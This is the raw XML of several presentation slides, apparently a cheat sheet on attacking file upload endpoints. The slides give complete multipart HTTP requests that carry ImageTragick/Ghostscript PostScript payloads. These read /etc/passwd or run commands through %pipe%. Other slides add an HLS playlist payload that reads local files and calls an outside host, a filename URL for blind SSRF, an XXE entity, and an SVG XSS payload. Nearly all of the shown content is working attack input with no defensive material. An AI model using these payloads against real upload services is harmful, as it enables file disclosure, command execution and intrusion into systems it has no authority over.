              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/buff 1024 string def</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/file_obj (/etc/passwd) (r) file def</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_obj buff readstring</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buff print</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p56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12" name="Google Shape;412;p56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56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414" name="Google Shape;41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56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16" name="Google Shape;416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025" y="2645650"/>
            <a:ext cx="421000" cy="41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7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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Read Local Files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422" name="Google Shape;422;p57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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(/etc/passwd) .libfile {</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>256 string readstring</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{print} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Google Shape;423;p57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24" name="Google Shape;424;p57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57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426" name="Google Shape;42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57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28" name="Google Shape;428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025" y="2645650"/>
            <a:ext cx="421000" cy="41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8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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Read Local Files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434" name="Google Shape;434;p58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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(/etc/passwd) .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>findlibfile</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>256 string readstring</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{print} if</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;p58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36" name="Google Shape;436;p58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58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438" name="Google Shape;43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58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40" name="Google Shape;440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025" y="2645650"/>
            <a:ext cx="421000" cy="41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Put File Name To Your IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. https://IP-v4.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Blind SSRF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212" name="Google Shape;212;p41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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundar</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://IP-v4/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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... contents of file here ...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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p41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14" name="Google Shape;214;p41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41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16" name="Google Shape;21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41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18" name="Google Shape;218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7350" y="2621200"/>
            <a:ext cx="462101" cy="365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9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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. id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446" name="Google Shape;446;p59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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/OutputFile(%pipe%id)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(pdfwrite)finddevice</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Putdeviceprops</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setdevice </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Google Shape;447;p59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48" name="Google Shape;448;p59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59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450" name="Google Shape;45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59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52" name="Google Shape;452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025" y="2645650"/>
            <a:ext cx="421000" cy="41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0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Insert ImageTragick Commands In Content Of The File</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Execute Commands </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. id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458" name="Google Shape;458;p60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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: image/png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%!PS</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>currentdevice null true mark /OutputICCProfile (%pipe%id &gt; /dev/tty)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.putdeviceparams</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quit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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;p60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60" name="Google Shape;460;p60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60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462" name="Google Shape;46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60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64" name="Google Shape;464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025" y="2645650"/>
            <a:ext cx="421000" cy="41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1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Insert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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0,</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concat:http://yngwie.ru/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Content Of The File</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394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 With Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mp4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Read Local File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470" name="Google Shape;470;p61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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>video</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.avi</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>video/avi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#EXTM3U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#EXT-X-MEDIA-SEQUENCE:0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#EXTINF:10.0,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concat:http://me.com/poc.m3u8|file:///etc/passwd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#EXT-X-ENDLIST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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p61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72" name="Google Shape;472;p61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61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474" name="Google Shape;47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025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61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477" name="Google Shape;477;p61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78" name="Google Shape;478;p6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025" y="3091500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61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80" name="Google Shape;480;p6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4025" y="3544600"/>
            <a:ext cx="421000" cy="3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6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64025" y="39399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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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83" name="Google Shape;483;p6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64025" y="4335250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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="42771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Payloads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2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Upload File Contents &lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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To Get XXE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490" name="Google Shape;490;p62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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: application/xml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&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Google Shape;491;p62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92" name="Google Shape;492;p62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62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494" name="Google Shape;494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025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62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497" name="Google Shape;497;p62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98" name="Google Shape;498;p6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025" y="3091500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62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00" name="Google Shape;500;p6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4025" y="3544600"/>
            <a:ext cx="421000" cy="3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6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64025" y="39399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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="387947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3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Upload SVG File Contents XSS Payloads e.g. &lt;svg onload=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"alert(document.domain);"&gt;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To Get XSS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508" name="Google Shape;508;p63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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.svg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: application/svg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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE svg [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    &lt;!ENTITY elem ""&gt;]&gt;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&lt;svg onload="alert(document.domain);" height="16" width="16"&gt;&amp;elem;&lt;/svg&gt;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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p63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10" name="Google Shape;510;p63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63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512" name="Google Shape;512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025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63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515" name="Google Shape;515;p63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16" name="Google Shape;516;p6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2925" y="3073200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4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</a:t>
            </a:r>
            <a:r>
